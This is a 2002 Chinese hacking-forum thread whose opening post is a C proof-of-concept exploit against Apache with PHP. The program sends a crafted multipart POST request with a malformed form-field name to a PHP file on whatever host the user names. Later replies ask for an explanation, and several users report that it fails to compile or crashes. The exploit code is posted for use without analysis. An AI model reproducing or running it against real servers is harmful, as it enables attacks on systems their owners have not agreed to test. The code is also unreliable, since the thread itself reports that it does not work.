>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  Apache & PHP Proof of Concept
发表文章 发表涂鸦
  回复数:9  点击数:195 将此页发给您的朋友        
作者 主题: Apache & PHP Proof of Concept 回复 | 收藏 | 打印 | 篇末
楚楚留香帅哥哦
级别:精灵王
威望:6
经验:1
货币:2090
体力:96
来源:61.159.251.*
总发帖数:590
注册日期:2001-04-17
查看 邮件 主页 QQ 消息 引用 复制 下载 

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 1000
#define PORT 80

char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

int main(int argc,char *argv[MAX])
{
int sockfd;
int numbytes;
int port;
char *ptr;

char POST_REQUEST[MAX] =
"POST ##file HTTP/1.0\n"
"Referer: http://host/xxxxxx/exp.php?hi_lames=haha\n"
"Connection: Keep-Alive\nContent-type: multipart/for"
"m-data; boundary=---------------------------1354088"
"10612827886801697150081\nContent-Length: 567\n\n---"
"--------------------------1354088106128278868016971"
"50081\nContent-Disposition: form-data; name=\"\x8\"";

struct hostent *he;
struct sockaddr_in their_addr;

if(argc!=4)
{
fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]);
exit(1);
}

port=atoi(argv[2]);
ptr=str_replace(argv[3],"##file",POST_REQUEST);
//ptr=POST_REQUEST;

if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}


if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}

their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);

if( connect(sockfd,(struct sockaddr*)&their_addr,\
sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}


if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
{
perror("send");
exit(0);
}

close(sockfd);

return 0;
}
----------------------------------------------------------
我竟改掉了落泪,也许是因为在黑暗中变得成熟了;成熟是因为心死了一半,心死了一半是因为没有了希望;没了希望是因为人们把我的退路断了;退路断了是因为这社会他妈的不想让我好好的活;这社会他妈的不想让我好好活是因为我从不肯妥协;我从不肯妥协是因为我还没人性的活着;我还没人性的活着是因为心中还有那么一点点的希望……
编辑 删除 发表时间发表于 2002-04-06.15:12:32  MSIE 6.0 Windows XPIP: 已记录
楚楚留香帅哥哦
级别:精灵王
威望:6
经验:1
货币:2090
体力:96
来源:61.159.251.*
总发帖数:590
注册日期:2001-04-17
查看 邮件 主页 QQ 消息 引用 复制 下载 

赶快假如精华
----------------------------------------------------------
我竟改掉了落泪,也许是因为在黑暗中变得成熟了;成熟是因为心死了一半,心死了一半是因为没有了希望;没了希望是因为人们把我的退路断了;退路断了是因为这社会他妈的不想让我好好的活;这社会他妈的不想让我好好活是因为我从不肯妥协;我从不肯妥协是因为我还没人性的活着;我还没人性的活着是因为心中还有那么一点点的希望……
编辑 删除 发表时间发表于 2002-04-06.16:31:56  MSIE 6.0 Windows XPIP: 已记录
痞菜帅哥哦
级别:管理员
威望:9
经验:15
货币:99939
体力:100
来源:不知道
总发帖数:2601
注册日期:2001-04-13
查看 邮件 主页 QQ 消息 引用 复制 下载 

其实这个我没成功过也没听到成功过:(
----------------------------------------------------------

哈哈
编辑 删除 发表时间发表于 2002-04-06.17:00:50  MSIE 5.01 Windows 2000IP: 已记录
baofeng帅哥哦
级别:老 站 友
威望:0
经验:0
货币:599
体力:23.3
来源:61.242.156.*
总发帖数:350
注册日期:2001-05-16
查看 邮件 主页 QQ 消息 引用 复制 下载 

留香,是不是你找的漏洞? 上面这个是溢出代码?
----------------------------------------------------------
I 'm like win32sdk.
http://win32sdk.com
编辑 删除 发表时间发表于 2002-04-06.17:12:56  MSIE 6.0 Windows MeIP: 已记录
0BIRD帅哥哦
级别:本站元老
威望:0
经验:0
货币:910
体力:40
来源:来自黑龙江省
总发帖数:1027
注册日期:2002-03-17
查看 邮件 主页 QQ 消息 引用 复制 下载 

能详细讲解吗?
我们菜鸟谢谢你了
----------------------------------------------------------
http://bbs.netxeyes.org/image/bbs3000/affix/20020603023845.jpg
编辑 删除 发表时间发表于 2002-04-06.17:23:23  MSIE 5.0 Windows 98IP: 已记录
baofeng帅哥哦
级别:老 站 友
威望:0
经验:0
货币:599
体力:23.3
来源:61.242.156.*
总发帖数:350
注册日期:2001-05-16
查看 邮件 主页 QQ 消息 引用 复制 下载 

PHP+APACHE的漏洞!原来代码没有编译成功!现在那个可以!
----------------------------------------------------------
I 'm like win32sdk.
http://win32sdk.com
编辑 删除 发表时间发表于 2002-04-06.17:59:37  MSIE 6.0 Windows MeIP: 已记录
孤独的鹰帅哥哦
级别:中级站友
威望:0
经验:0
货币:480
体力:45
来源:福建
总发帖数:96
注册日期:2002-03-11
查看 邮件 主页 QQ 消息 引用 复制 下载 

不会吧 我用的是xfocus上,可惜没有成功,只是代码一跑就跳掉了。现在是不是修改了
----------------------------------------------------------
既然选择了远方
就必须日夜兼程
编辑 删除 发表时间发表于 2002-04-06.20:09:54  MSIE 5.01 Windows 2000IP: 已记录
X-laser帅哥哦
级别:长 老 级
威望:0
经验:0
货币:37
体力:0.5
来源:61.174.133.*
总发帖数:628
注册日期:2002-02-10
查看 邮件 主页 QQ 消息 引用 复制 下载 

试试在red上编译
编辑 删除 发表时间发表于 2002-04-06.20:15:34  MSIE 5.0 Windows 98IP: 已记录
baofeng帅哥哦
级别:老 站 友
威望:0
经验:0
货币:599
体力:23.3
来源:61.242.156.*
总发帖数:350
注册日期:2001-05-16
查看 邮件 主页 QQ 消息 引用 复制 下载 

原文由 孤独的鹰 发表:
不会吧 我用的是xfocus上,可惜没有成功,只是代码一跑就跳掉了。现在是不是修改了


对呀!
----------------------------------------------------------
I 'm like win32sdk.
http://win32sdk.com
编辑 删除 发表时间发表于 2002-04-06.20:19:05  MSIE 6.0 Windows MeIP: 已记录
HUA帅哥哦
级别:一般站友
威望:0
经验:0
货币:6
体力:0.2
来源:海南
总发帖数:27
注册日期:2002-01-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

浪费人的时间...........
哎..
编辑 删除 发表时间发表于 2002-04-06.20:50:04  MSIE 5.0 Windows 98IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符
[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 1 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题